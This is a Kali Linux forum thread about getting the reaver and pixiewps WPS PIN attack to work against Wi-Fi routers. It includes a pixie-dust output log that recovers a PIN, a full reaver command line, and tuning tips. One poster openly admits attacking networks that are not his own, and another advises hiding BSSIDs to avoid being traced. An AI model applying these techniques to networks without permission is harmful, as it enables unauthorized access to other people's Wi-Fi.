whitetsagan
2016-04-29, 05:58
Brother, haha. Let's be honest, you, me, we all know we are not trying to get reaver/pixie working just to mess with our own network. FYI, I have got one exactly as same as this network, just not at the moment, which throws same error. Trust me one this one. :P But even though I have my own, I don't have access to the network config though.

I am well aware of that it is not about pixie. It's about reaver. Reason why I am here is nobody there to give proper answer in other discussions. And I tend to see experts who are modifying reaver prowl around here. So please share what you know about this. Have I been honest enough? I pretty much think so. :P

kcdtv
2016-04-29, 11:47
Brother, haha. Let's be honest, you, me, we all know we are not trying to get reaver/pixie working just to mess with our own network.
bro', i am not judging you or telling you what to do or not.
My point of view is not moral, i am not administrator or moderator of this forum and i really don't care about what you do at your home, that's not my business and i am not a cop, **** no! ;)
The point is that if you are not in good conditions with a real knowledge about the configuration of the access point ... if you get "error code 04 wps transaction failed" or something like this there could be so much reasons... from interferences made by other clients associated to the RXQ you get, you don't even know if WPS is properly enabled,
So "experts" will tell you to get closer to access point, to disconnect all devices when you make your test, to rise delay between PIN...
I can give you an example : Spanish livebox 2.1 will let you send a PIN just if you are very very close to the access point with delay 5 and will handle one PIN out 5, It is not a defense mechanism or something like that, just the way wps is implemented (badly)
while you could PIN brute force fast as **** other devices in bad conditions that would not even allow you to reach 1MBpS when you connect to them in the same conditions...
So if yo are on "spanish livebox 2.1" kind of router, there is nothing yo can do, no bug, and nothing to tell you... when i see this default ssid i imagine one of this crappy "box" with so little range that i can easily imagine why you cannot "reaver" it if you are more than 10 meters away from the device..
Anyway, you are not giving enough elements to answer you... scan with airodmp-ng should be done with --bssid filter and --channel filter, we should see the output of your probes to get info about the device, we should get an exact stdout of what is going on with reaver.

Reason why I am here is nobody there to give proper answer in other discussions.
If this topic is about pixiewps : Do you think it is respectful for wiire who made this tool for all of us to use his thread to ask whatever yo want? If everybody does like you, what would be the result?

Have I been honest enough? I pretty much think so. :P
You know .. be honnest with your girl (or boy), be honest with your bro' and mum...but with the rest.. be clever.
Saying in a public forum that you are "hacking" network and uploading pictures with full bssid and essid of this networks is not clever.
That why i recommend you to "edit" your pictures by erasing the end of bssid and essid... because doing like yo do is like declaring to the whole world "here i am! Check this macs and essid; i live 25 meters aways!"
Well, my point is: Please, reconsider the way you act in this thread, i think it is a shame to "deviate" it and this forum is full of shity and useless themes that you could use to ask questions. But the work from wiire and this thread is without any doubt one of the best and more usefull in this whole forum, please, respect it and help to respect it.
take care

whitetsagan
2016-04-29, 16:36
Finally able to create my account in this forum

[P] E-Nonce: 41: f2: 8c: 82: 53: 3b: df: ........
[P] PKE: 6b: 0e: 22: cb: cd: 21: ........
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Number: RT2860
[+] Received message M1
[P] AuthKey: f7: fb: bc: 21: ab: 3b: 99: 70: 36: 8e: f1: a0: ........
[+] Sending message M2
[P] E-Hash1: 1e: d6: 12: 27: 8f: 12: 28: 21: 9a: 54: .........
[P] E-Hash2: d: f: 34: and: ac: 55: a4: 9e: b3: 95: 31: 7a: 61: b0: ........
[Pixie-Dust]
[Pixie-Dust] ES-1: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00
[Pixie-Dust] ES-2: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00
[Pixie Dust-] PSK1: 76: 46: 96: c7: 5d: e4: 8a: 86: .......
[Pixie-Dust] PSK2: 1b: 5e: 3e: 6b: 19: 89: 4b: 5c: .......
[Pixie-Dust] [+] WPS pin: 41368541
[Pixie-Dust]
[Pixie-Dust] Time taken: 0 s
[Pixie-Dust]
[+] Received message M3
[+] Sending message M4

If someone want this version, tell me

First I saw t6x's post above somewhere in this thread and thought I could find some useful information about it because the chipset he mentioned and mine are the same.


bro', i am not judging you or telling you what to do or not.
My point of view is not moral, i am not administrator or moderator of this forum and i really don't care about what you do at your home, that's not my business and i am not a cop, **** no! ;)
The point is that if you are not in good conditions with a real knowledge about the configuration of the access point ... if you get "error code 04 wps transaction failed" or something like this there could be so much reasons... from interferences made by other clients associated to the RXQ you get, you don't even know if WPS is properly enabled,
So "experts" will tell you to get closer to access point, to disconnect all devices when you make your test, to rise delay between PIN...
I can give you an example : Spanish livebox 2.1 will let you send a PIN just if you are very very close to the access point with delay 5 and will handle one PIN out 5, It is not a defense mechanism or something like that, just the way wps is implemented (badly)
while you could PIN brute force fast as **** other devices in bad conditions that would not even allow you to reach 1MBpS when you connect to them in the same conditions...
So if yo are on "spanish livebox 2.1" kind of router, there is nothing yo can do, no bug, and nothing to tell you... when i see this default ssid i imagine one of this crappy "box" with so little range that i can easily imagine why you cannot "reaver" it if you are more than 10 meters away from the device..
Anyway, you are not giving enough elements to answer you... scan with airodmp-ng should be done with --bssid filter and --channel filter, we should see the output of your probes to get info about the device, we should get an exact stdout of what is going on with reaver.

I tried reaver on my router by sitting just right next to it and it was the same. Same error 0x04. My knowledge about this whole kali is so shallow but I am very interested in it. But it's kind of sad there is so few are to tell. I could try giving every info needed.


If this topic is about pixiewps : Do you think it is respectful for wiire who made this tool for all of us to use his thread to ask whatever yo want? If everybody does like you, what would be the result?

You know .. be honnest with your girl (or boy), be honest with your bro' and mum...but with the rest.. be clever.
Saying in a public forum that you are "hacking" network and uploading pictures with full bssid and essid of this networks is not clever.
That why i recommend you to "edit" your pictures by erasing the end of bssid and essid... because doing like yo do is like declaring to the whole world "here i am! Check this macs and essid; i live 25 meters aways!"
Well, my point is: Please, reconsider the way you act in this thread, i think it is a shame to "deviate" it and this forum is full of shity and useless themes that you could use to ask questions. But the work from wiire and this thread is without any doubt one of the best and more usefull in this whole forum, please, respect it and help to respect it.
take care

I understood everything so clear that you could see adele rolling from 1000 meters away. :p And yes, I have done a bad thing regarding morality literally. I do have respect for those who are modifying and developing for nothing, too. I actually have almost nothing to say as defense and you got me real good. But also please try to understand and consider what I am mentioning since we are in the bucket. :o

soxrok2212
2016-04-30, 16:48
The same chipset doesn't mean anything. It's like saying my car has the same motor as you, why doesn't it work? Every system may be configured differently, slightly different parts, different firmware, different implementations, perhaps they are not using the reference code supplied by the chip manufacturer. There are a plethora of possible solutions to your answer, and without the proper information we can't help. We need to know the model of the AP, chipset, manufacturer, if WPS is configured or not, and if you want to really get into it, it is best if you have administrator access so we can see the configuration of it and make an assessment from there.

Imran Jami
2016-05-23, 13:54
Dear any Solution for this issue of RTL8671? I am still waiting any update for This stupid model RTL8671.

soxrok2212
2016-05-23, 16:37
No. There will be an update if it is supported, no need to keep asking.

thasarupof
2017-01-14, 06:01
you said it is an offline attack right ?
so does this mean i can bruteforce when i am far from AP ?
if i have all those parameter values.. ?

soxrok2212
2017-01-19, 05:45
Yes it is offline. Yes you can bruteforce when you are far from the AP, but you need to have all the information gathered from it first, meaning you have to be near it at some point to get it.

RAZERZDAHACKER
2017-01-20, 14:38
Got the wps pin using "reaver -i wlan0mon -b (insert bssid here) -vvv -W 2 (it is a belkin router) -a -c (insert channel number here), tried to get the passwd using the --pin= option in reaver and it gives me a hash looking thing for the passwd. I still couldn't use that "hash" to connect to the network. I tried to disconnect all AP's from the client as well as changing my mac address to one of the AP's connected on the network, still no success. However, I couldn't help but notice that each time I tried with the passwd I got from pixie, it got NACS errors but every time I tried with a different wps pin than the correct one, it tests it and reports that it didn't work. Kinda stuck here. Some information: WPA and WPS (no WPA2), Belkin chipset, WPS is not locked and is, according to the command "wash -i wlan0mon" at a version 1.0 and it does send out beacons frequently. I'm not very far away from the router, according to the wash command, -59. I just want to learn why this is happening and explore.

shrinivas murthi
2017-02-18, 09:18
Rtl8671 and linksys e900 is there any way to crack wps pin of above chipset??

maxwell8686
2017-04-16, 09:18
Got the wps pin using "reaver -i wlan0mon -b (insert bssid here) -vvv -W 2 (it is a belkin router) -a -c (insert channel number here), tried to get the passwd using the --pin= option in reaver and it gives me a hash looking thing for the passwd. I still couldn't use that "hash" to connect to the network. I tried to disconnect all AP's from the client as well as changing my mac address to one of the AP's connected on the network, still no success. However, I couldn't help but notice that each time I tried with the passwd I got from pixie, it got NACS errors but every time I tried with a different wps pin than the correct one, it tests it and reports that it didn't work. Kinda stuck here. Some information: WPA and WPS (no WPA2), Belkin chipset, WPS is not locked and is, according to the command "wash -i wlan0mon" at a version 1.0 and it does send out beacons frequently. I'm not very far away from the router, according to the wash command, -59. I just want to learn why this is happening and explore.

It didnt work for me at all 0.00

wiire
2017-11-09, 19:31
We started a new thread for collecting data: https://forums.kali.org/showthread.php?38127-Data-gathering-for-pixiewps-(pixie-dust-attack)&p=75368&viewfull=1#post75368